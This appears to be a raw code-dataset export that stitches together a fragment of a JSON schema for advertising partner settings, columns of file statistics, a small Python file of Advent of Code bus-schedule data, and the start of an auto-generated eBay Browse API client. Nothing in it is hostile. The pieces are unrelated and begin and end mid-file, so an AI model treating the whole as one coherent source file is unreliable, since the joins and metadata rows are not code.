"mode":"NULLABLE",
},
{ "name":"name",
"type":"STRING",
"mode":"NULLABLE",
},
{ "name":"active",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
{ "name":"integration_code",
"type":"STRING",
"mode":"NULLABLE",
},
]
},
{ "name":"currency_code",
"type":"STRING",
"mode":"NULLABLE",
},
{ "name":"exchange_settings",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"exchange_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"seat_id",
"type":"STRING",
"mode":"NULLABLE",
},
{ "name":"seat_user_name",
"type":"STRING",
"mode":"NULLABLE",
},
]
},
{ "name":"default_partner_costs",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"cpm_fee_1_advertiser_micros",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_2_advertiser_micros",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_3_advertiser_micros",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_4_advertiser_micros",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_5_advertiser_micros",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_1_millis",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_2_millis",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_3_millis",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_4_millis",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_5_millis",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_1_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_2_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_3_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_4_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_5_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_1_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_2_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_3_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_4_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_5_cost_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_1_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_2_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_3_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_4_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"cpm_fee_5_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_1_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_2_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_3_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_4_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_fee_percent_5_bill_to_type",
"type":"INTEGER",
"mode":"NULLABLE",
},
]
},
{ "name":"default_partner_revenue_model",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"type",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"amount_advertiser_micros",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"media_cost_markup_percent_millis",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"post_view_conversion_tracking_fraction",
"type":"FLOAT",
"mode":"NULLABLE",
},
]
},
{ "name":"default_target_list",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"inventory_sources",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"geo_locations",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"ad_position",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"net_speed",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"browsers",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"union",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"parameter",
"type":"STRING",
"mode":"NULLABLE",
},
]
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"device_criteria",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"languages",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"union",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"parameter",
"type":"STRING",
"mode":"NULLABLE",
},
]
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"day_parting",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"union",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"parameter",
"type":"STRING",
"mode":"NULLABLE",
},
]
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"audience_intersect",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"union",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"parameter",
"type":"STRING",
"mode":"NULLABLE",
},
]
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"keywords",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"parameter",
"type":"STRING",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"kct_include_uncrawled_sites",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
{ "name":"page_categories",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"universal_channels",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"sites",
"type":"RECORD",
"mode":"REPEATED",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"parameter",
"type":"STRING",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
{ "name":"brand_safety",
"type":"RECORD",
"mode":"NULLABLE",
"fields":[
{ "name":"criteria_id",
"type":"INTEGER",
"mode":"NULLABLE",
},
{ "name":"excluded",
"type":"BOOLEAN",
"mode":"NULLABLE",
},
]
},
]
},
]
| 25.118026
| 75
| 0.412986
| 907
| 11,705
| 5.116869
| 0.157663
| 0.224952
| 0.262013
| 0.242836
| 0.820082
| 0.796811
| 0.704159
| 0.704159
| 0.682181
| 0.534368
| 0
| 0.005247
| 0.38129
| 11,705
| 466
| 76
| 25.118026
| 0.635598
| 0.047672
| 0
| 0.580357
| 0
| 0
| 0.398962
| 0.077498
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43078a9200b40ea3324c4c8054d6c5c14175c20b
| 378
|
py
|
Python
|
day13/observations.py
|
UpwardTrajectory/advent_2020
|
b19a37bb40ed43deddfaab4a4e68f2ca6ac43a90
|
[
"MIT"
] | null | null | null |
day13/observations.py
|
UpwardTrajectory/advent_2020
|
b19a37bb40ed43deddfaab4a4e68f2ca6ac43a90
|
[
"MIT"
] | null | null | null |
day13/observations.py
|
UpwardTrajectory/advent_2020
|
b19a37bb40ed43deddfaab4a4e68f2ca6ac43a90
|
[
"MIT"
] | null | null | null |
sample = """939
7,13,x,x,59,x,31,19"""
tests = {
3417: "0\n17,x,13,19"
, 754018: "0\n67,7,59,61"
, 779210: "0\n67,x,7,59,61"
, 1261476: "0\n67,7,x,59,61"
, 1202161486: "0\n1789,37,47,1889"
}
schedules = """1000495
19,x,x,x,x,x,x,x,x,41,x,x,x,x,x,x,x,x,x,521,x,x,x,x,x,x,x,23,x,x,x,x,x,x,x,x,17,x,x,x,x,x,x,x,x,x,x,x,29,x,523,x,x,x,x,x,37,x,x,x,x,x,x,13"""
| 29.076923
| 141
| 0.534392
| 109
| 378
| 1.853211
| 0.275229
| 0.475248
| 0.594059
| 0.653465
| 0.267327
| 0.242574
| 0.212871
| 0.178218
| 0.09901
| 0.054455
| 0
| 0.351515
| 0.126984
| 378
| 13
| 141
| 29.076923
| 0.260606
| 0
| 0
| 0
| 0
| 0.090909
| 0.641161
| 0.364116
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
431107bd887efe2b8be3063f3cec39f046372c88
| 38,859
|
py
|
Python
|
src/ebay_rest/api/buy_browse/api/search_by_image_api.py
|
matecsaj/ebay_rest
|
dd23236f39e05636eff222f99df1e3699ce47d4a
|
[
"MIT"
] | 3
|
2021-12-12T04:28:03.000Z
|
2022-03-10T03:29:18.000Z
|
src/ebay_rest/api/buy_browse/api/search_by_image_api.py
|
jdavv/ebay_rest
|
20fc88c6aefdae9ab90f9c1330e79abddcd750cd
|
[
"MIT"
] | 33
|
2021-06-16T20:44:36.000Z
|
2022-03-30T14:55:06.000Z
|
src/ebay_rest/api/buy_browse/api/search_by_image_api.py
|
jdavv/ebay_rest
|
20fc88c6aefdae9ab90f9c1330e79abddcd750cd
|
[
"MIT"
] | 7
|
2021-06-03T09:30:23.000Z
|
2022-03-08T19:51:33.000Z
|
# coding: utf-8
"""
Browse API
<p>The Browse API has the following resources:</p> <ul> <li><b> item_summary: </b> Lets shoppers search for specific items by keyword, GTIN, category, charity, product, or item aspects and refine the results by using filters, such as aspects, compatibility, and fields values.</li> <li><b> search_by_image: </b><a href=\"https://developer.ebay.com/api-docs/static/versioning.html#experimental\" target=\"_blank\"><img src=\"/cms/img/docs/experimental-icon.svg\" class=\"legend-icon experimental-icon\" alt=\"Experimental Release\" title=\"Experimental Release\" /> (Experimental)</a> Lets shoppers search for specific items by image. You can refine the results by using URI parameters and filters.</li> <li><b> item: </b> <ul><li>Lets you retrieve the details of a specific item or all the items in an item group, which is an item with variations such as color and size and check if a product is compatible with the specified item, such as if a specific car is compatible with a specific part.</li> <li>Provides a bridge between the eBay legacy APIs, such as <b> Finding</b>, and the RESTful APIs, which use different formats for the item IDs.</li> </ul> </li> <li> <b> shopping_cart: </b> <a href=\"https://developer.ebay.com/api-docs/static/versioning.html#experimental\" target=\"_blank\"><img src=\"/cms/img/docs/experimental-icon.svg\" class=\"legend-icon experimental-icon\" alt=\"Experimental Release\" title=\"Experimental Release\" /> (Experimental)</a> <a href=\"https://developer.ebay.com/api-docs/static/versioning.html#limited\" target=\"_blank\"> <img src=\"/cms/img/docs/partners-api.svg\" class=\"legend-icon partners-icon\" title=\"Limited Release\" alt=\"Limited Release\" />(Limited Release)</a> Provides the ability for eBay members to see the contents of their eBay cart, and add, remove, and change the quantity of items in their eBay cart. <b> Note: </b> This resource is not available in the eBay API Explorer.</li></ul> <p>The <b> item_summary</b>, <b> search_by_image</b>, and <b> item</b> resource calls require an <a href=\"/api-docs/static/oauth-client-credentials-grant.html\">Application access token</a>. The <b> shopping_cart</b> resource calls require a <a href=\"/api-docs/static/oauth-authorization-code-grant.html\">User access token</a>.</p> # noqa: E501
OpenAPI spec version: v1.11.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ...buy_browse.api_client import ApiClient
class SearchByImageApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def search_by_image(self, **kwargs): # noqa: E501
"""search_by_image # noqa: E501
<img src=\"/cms/img/docs/experimental-icon.svg\" class=\"legend-icon experimental-icon\" alt=\"Experimental Release\" title=\"Experimental Release\"> This is an <a href=\"https://developer.ebay.com/api-docs/static/versioning.html#experimental\">Experimental</a> method. <p>This method searches for eBay items based on a image and retrieves summaries of the items. You pass in a Base64 image in the request payload and can refine the search by category, or eBay product ID (ePID), or a combination of these using URI parameters. <br /><br />To get the Base64 image string, you can use sites such as <a href=\"https://codebeautify.org/image-to-base64-converter\" target=\"_blank\">https://codebeautify.org/image-to-base64-converter</a>. </p> <p>This method also supports the following: <ul> <li>Filtering by the value of one or multiple fields, such as listing format, item condition, price range, location, and more. For the fields supported by this method, see the <a href=\"#uri.filter\">filter</a> parameter.</li> <li>Filtering by item aspects using the <a href=\"#uri.aspect_filter\">aspect_filter</a> parameter. </li> </ul></p> <p>For details and examples of these capabilities, see <a href=\"/api-docs/buy/static/api-browse.html\">Browse API</a> in the Buying Integration Guide.</p> <h3><b>Pagination and sort controls</b></h3> <p>There are pagination controls (<b>limit</b> and <b>offset</b> fields) and <b> sort</b> query parameters that control/sort the data that is returned. By default, the results are sorted by "Best Match". For more information about Best Match, see the eBay help page <a href=\"https://pages.ebay.com/help/sell/searchstanding.html\" target=\"_blank\">Best Match</a>. </p> <h3><b> URLs for this method</b></h3> <p><ul> <li><b> Production URL: </b> <code>https://api.ebay.com/buy/browse/v1/item_summary/search_by_image?</code></li> <li><b> Sandbox URL: </b>Due to the data available, this method is not supported in the eBay Sandbox. To test your integration, use the Production URL.</li> </ul> </p> <h3><b> Request headers</b></h3> This method uses the <b>X-EBAY-C-ENDUSERCTX</b> request header to support revenue sharing for eBay Partner Networks and to improve the accuracy of shipping and delivery time estimations. For details see, <a href=\"/api-docs/buy/static/api-browse.html#Headers\">Request headers</a> in the Buying Integration Guide. <h3><b>URL Encoding for Parameters</b></h3> <p>Query parameter values need to be URL encoded. For details, see <a href=\"/api-docs/static/rest-request-components.html#parameters\">URL encoding query parameter values</a>. For readability, code examples in this document have not been URL encoded.</p> <h3><b>Restrictions </b></h3> <p>This method can return a maximum of 10,000 items. For a list of supported sites and other restrictions, see <a href=\"/api-docs/buy/browse/overview.html#API\">API Restrictions</a>.</p> <span class=\"tablenote\"><b>eBay Partner Network: </b> In order to receive a commission for your sales, you must use the URL returned in the <code>itemAffiliateWebUrl</code> field to forward your buyer to the ebay.com site. </span> # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_by_image(async_req=True)
>>> result = thread.get()
:param async_req bool
:param SearchByImageRequest body: The container for the image information fields.
:param str aspect_filter: This field lets you filter by item aspects. The aspect name/value pairs and category, which is required, is used to limit the results to specific aspects of the item. For example, in a clothing category one aspect pair would be Color/Red. <br /><br />For example, the method below uses the category ID for Women's Clothing. This will return only items for a woman's red shirt.<br /><br /><code>category_ids=15724&aspect_filter=categoryId:15724,Color:{Red}</code> <br /><br /><b>Required: </b> The category ID is required <i>twice</i>; once as a URI parameter and as part of the <b> aspect_filter</b>. For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/buy/browse/types/gct:AspectFilter
:param str category_ids: The category ID is used to limit the results. This field can have one category ID or a comma separated list of IDs. <br /><br /><span class=\"tablenote\"><b> Note: </b>Currently, you can pass in only one category ID per request.</span> <br /> <br />You can also use any combination of the <b> category_Ids</b> and <b> epid</b> fields. This gives you additional control over the result set.<br /> <br />The list of eBay category IDs is not published and category IDs are not the same across all the eBay marketplaces. You can use the following techniques to find a category by site: <ul> <li>Use the <a href=\"https://pages.ebay.com/sellerinformation/news/categorychanges.html\" target=\"_blank\">Category Changes page</a>.</li> <li>Use the Taxonomy API. For details see <a href=\"/api-docs/buy/buy-categories.html\">Get Categories for Buy APIs</a>. </li> <li>Submit the following method to get the <b> dominantCategoryId</b> for an item. <br /><code>/buy/browse/v1/item_summary/search?q=<em > keyword</em>&fieldgroups=ASPECT_REFINEMENTS </code></li></ul> <b> Required: </b> The method must have <b> category_ids</b> or <b> epid</b> (or any combination of these)
:param str charity_ids: The charity ID is used to limit the results to only items associated with the specified charity. This field can have one charity ID or a comma separated list of IDs. The method will return all the items associated with the specified charities.<br /><br /> <b>For example:</b><br /><code>/buy/browse/v1/item_summary/search?charity_ids=13-1788491,300108469</code><br /><br />The charity ID is the charity's registration ID, also known as the Employer Identification Number (EIN). In GB, it is the Charity Registration Number (CRN), commonly called \"Charity Number\". <ul><li>To find the charities eBay supports, you can search for a charity at <a href=\"https://charity.ebay.com/search\" target=\"_blank\">Charity Search </a> or go to <a href=\"https://www.ebay.com/b/Charity/bn_7114598164\" target=\"_blank\">Charity Shop</a>.</li> <li>To find the charity ID of a specific charity, click on a charity and use the EIN number. For example, the charity ID for <a href=\"https://charity.ebay.com/charity/American-Red-Cross/3843\" target=\"_blank\">American Red Cross</a>, is <code>530196605</code>.</li></ul> You can also use any combination of the <code>category_Ids</code> and <code>q</code> fields with a <code>charity_Ids</code> to filter the result set. This gives you additional control over the result set. <br /><br /><b>Restriction: </b> This is supported only on the US and GB marketplaces.<br /><br /><b>Maximum: </b> 20 IDs <br /><br /><b>Required:</b> One ID
:param str fieldgroups: This field is a comma separated list of values that lets you control what is returned in the response. The default is <b> MATCHING_ITEMS</b>, which returns the items that match the keyword or category specified. The other values return data that can be used to create histograms or provide additional information. <br /><br /><b> Valid Values: </b> <ul> <li><b> ASPECT_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.aspectDistributions\">aspectDistributions</a> container, which has the <b> dominantCategoryId</b>, <b> matchCount</b>, and <b> refinementHref</b> for the various aspects of the items found. For example, if you searched for 'Mustang', some of the aspect would be <b> Model Year</b>, <b> Exterior Color</b>, <b> Vehicle Mileage</b>, etc. <br /> <br /><span class=\"tablenote\"> <b>Note: </b> ASPECT_REFINEMENTS are category specific.</span> <br /><br /></li> <li><b> BUYING_OPTION_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.buyingOptionDistributions\">buyingOptionDistributions</a> container, which has the <b> matchCount</b> and <b> refinementHref</b> for <b> AUCTION</b> and <b> FIXED_PRICE</b> (Buy It Now) items. <br /><br /><span class=\"tablenote\"> <b>Note: </b>Classified items are not supported and only \"Buy It Now\" (non-auction) items are returned.</span> <br /><br /> </li> <li><b> CATEGORY_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.categoryDistributions\">categoryDistributions</a> container, which has the categories that the item is in. </li> <li><b> CONDITION_REFINEMENTS</b> - This returns the <a href=\"#response.refinement.conditionDistributions\">conditionDistributions</a> container, such as <b> NEW</b>, <b> USED</b>, etc. Within these groups are multiple states of the condition. For example, <b> New </b> can be New without tag, New in box, New without box, etc. </li> <li><b> EXTENDED</b> - This returns the <a href=\"/api-docs/buy/browse/resources/item_summary/methods/search#response.itemSummaries.shortDescription\">shortDescription</a> field, which provides condition and item aspect information and the <a href=\"/api-docs/buy/browse/resources/item_summary/methods/search#response.itemSummaries.itemLocation.city\">itemLocation.city</a> field. </li> <li><b> MATCHING_ITEMS</b> - This is meant to be used with one or more of the refinement values above. You use this to return the specified refinements and all the matching items. </li> <li><b> FULL </b> - This returns all the refinement containers and all the matching items.</li> </ul> Code so that your app gracefully handles any future changes to this list. <br /><br /><b>Default: </b> MATCHING_ITEMS
:param str filter: This field supports multiple field filters that can be used to limit/customize the result set. <br /><br /><b> For example: </b><br /><code>/buy/browse/v1/item_summary/search?q=shirt&filter=price:[10..50]</code><br /><br />You can also combine filters. <br /><code>/buy/browse/v1/item_summary/search?q=shirt&filter=price:[10..50],sellers:{rpseller|bigSal} </code> <br /><br />The following are the supported filters. For details and examples for all the filters, see <a href=\"/api-docs/buy/static/ref-buy-browse-filters.html\">Buy API Field Filters</a>. <div style=\"overflow-x:auto;\"> <table> <tr> <td> <ul> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#bidCount\">bidCount</a> </li><li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#buyingOptions\">buyingOptions</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#charityOnly\">charityOnly</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#conditionIds\">conditionIds</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#conditions\">conditions</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#deliveryCountry\">deliveryCountry</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#deliveryOptions\">deliveryOptions</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#deliveryPostalCode\">deliveryPostalCode</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#excludeCategoryIds\">excludeCategoryIds</a> </li> </ul></td> <td> <ul> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#excludeSellers\">excludeSellers</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#guaranteedDeliveryInDays\">guaranteedDeliveryInDays</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#itemEndDate\">itemEndDate</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#itemLocationCountry\">itemLocationCountry</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#itemStartDate\">itemStartDate</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#maxDeliveryCost\">maxDeliveryCost</a></li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#paymentMethods\">paymentMethods</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupCountry\">pickupCountry</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupPostalCode\">pickupPostalCode</a> </li> </ul> </td> <td> <ul> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupRadius\">pickupRadius</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupRadiusUnit\">pickupRadiusUnit</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#price\">price</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#priceCurrency\">priceCurrency</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#qualifiedPrograms\">qualifiedPrograms</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#returnsAccepted\">returnsAccepted</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#sellerAccountTypes\">sellerAccountTypes</a> </li> <li><a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#sellers\">sellers</a> </li> </ul></td> </tr> </table> </div> For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/buy/browse/types/cos:FilterField
:param str limit: The number of items, from the result set, returned in a single page. <br /><br /><b> Default:</b> 50 <br /> <br /><b> Maximum number of items per page (limit): </b>200 <br /> <br /> <b> Maximum number of items in a result set: </b> 10,000
:param str offset: The number of items to skip in the result set. This is used with the <b> limit</b> field to control the pagination of the output. <br /><br />If <b> offset</b> is 0 and <b> limit</b> is 10, the method will retrieve items 1-10 from the list of items returned, if <b> offset</b> is 10 and <b> limit</b> is 10, the method will retrieve items 11 thru 20 from the list of items returned. <br /><br /><b> Valid Values</b>: 0-10,000 (inclusive) <br /> <br /> <b> Default:</b> 0 <br /> <br /> <b> Maximum number of items returned: </b> 10,000
:param str sort: Specifies the order and the field name to use to sort the items. <br /><br />You can sort items by price (in ascending or descending order) or by distance (only applicable if the <a href=\"/api-docs/buy/static/ref-buy-browse-filters.html#pickupCountry\">\"pickup\" filters</a> are used, and only ascending order is supported). You can also sort items by listing date, with the most recently listed (newest) items appearing first.<br /><br /><span class=\"tablenote\"><b>Note: </b> To sort in descending order, insert a hyphen (<code>-</code>) before the field name. If no <b>sort</b> parameter is submitted, the result set is sorted by "<a href=\"https://pages.ebay.com/help/sell/searchstanding.html\" target=\"_blank\">Best Match</a>".</span><br /><br />The following are examples of using the <b> sort</b> query parameter.<br /><br /><table><tr><th>Sort</th><th>Result</th> </tr> <tr> <td><code>sort=price</code></td> <td> Sorts by <b> price</b> in ascending order (lowest price first)</td> </tr> <tr> <td><code>sort=-price</code></td> <td> Sorts by <b> price</b> in descending order (highest price first)</td> </tr> <tr> <td><code>sort=distance</code></td> <td> Sorts by <b> distance</b> in ascending order (shortest distance first)</td> </tr> <tr> <td><code>sort=newlyListed</code></td> <td>Sorts by <b>listing date</b> (most recently listed/newest items first)</td> </tr> <tr> <td><code>sort=endingSoonest</code></td> <td>Sorts by <b>date/time</b> the listing ends (listings nearest to end date/time first)</td> </tr> </table> <br /><b> Default: </b> Ascending For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/buy/browse/types/cos:SortField
:return: SearchPagedCollection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_by_image_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.search_by_image_with_http_info(**kwargs) # noqa: E501
return data
def search_by_image_with_http_info(self, **kwargs): # noqa: E501
"""search_by_image # noqa: E501
<img src=\"/cms/img/docs/experimental-icon.svg\" class=\"legend-icon experimental-icon\" alt=\"Experimental Release\" title=\"Experimental Release\"> This is an <a href=\"https://developer.ebay.com/api-docs/static/versioning.html#experimental\">Experimental</a> method. <p>This method searches for eBay items based on a image and retrieves summaries of the items. You pass in a Base64 image in the request payload and can refine the search by category, or eBay product ID (ePID), or a combination of these using URI parameters. <br /><br />To get the Base64 image string, you can use sites such as <a href=\"https://codebeautify.org/image-to-base64-converter\" target=\"_blank\">https://codebeautify.org/image-to-base64-converter</a>. </p> <p>This method also supports the following: <ul> <li>Filtering by the value of one or multiple fields, such as listing format, item condition, price range, location, and more. For the fields supported by this method, see the <a href=\"#uri.filter\">filter</a> parameter.</li> <li>Filtering by item aspects using the <a href=\"#uri.aspect_filter\">aspect_filter</a> parameter. </li> </ul></p> <p>For details and examples of these capabilities, see <a href=\"/api-docs/buy/static/api-browse.html\">Browse API</a> in the Buying Integration Guide.</p> <h3><b>Pagination and sort controls</b></h3> <p>There are pagination controls (<b>limit</b> and <b>offset</b> fields) and <b> sort</b> query parameters that control/sort the data that is returned. By default, the results are sorted by "Best Match". For more information about Best Match, see the eBay help page <a href=\"https://pages.ebay.com/help/sell/searchstanding.html\" target=\"_blank\">Best Match</a>. </p> <h3><b> URLs for this method</b></h3> <p><ul> <li><b> Production URL: </b> <code>https://api.ebay.com/buy/browse/v1/item_summary/search_by_image?</code></li> <li><b> Sandbox URL: </b>Due to the data available, this method is not supported in the eBay Sandbox. To test your integration, use the Production URL.</li> </ul> </p> <h3><b> Request headers</b></h3> This method uses the <b>X-EBAY-C-ENDUSERCTX</b> request header to support revenue sharing for eBay Partner Networks and to improve the accuracy of shipping and delivery time estimations. For details see, <a href=\"/api-docs/buy/static/api-browse.html#Headers\">Request headers</a> in the Buying Integration Guide. <h3><b>URL Encoding for Parameters</b></h3> <p>Query parameter values need to be URL encoded. For details, see <a href=\"/api-docs/static/rest-request-components.html#parameters\">URL encoding query parameter values</a>. For readability, code examples in this document have not been URL encoded.</p> <h3><b>Restrictions </b></h3> <p>This method can return a maximum of 10,000 items. For a list of supported sites and other restrictions, see <a href=\"/api-docs/buy/browse/overview.html#API\">API Restrictions</a>.</p> <span class=\"tablenote\"><b>eBay Partner Network: </b> In order to receive a commission for your sales, you must use the URL returned 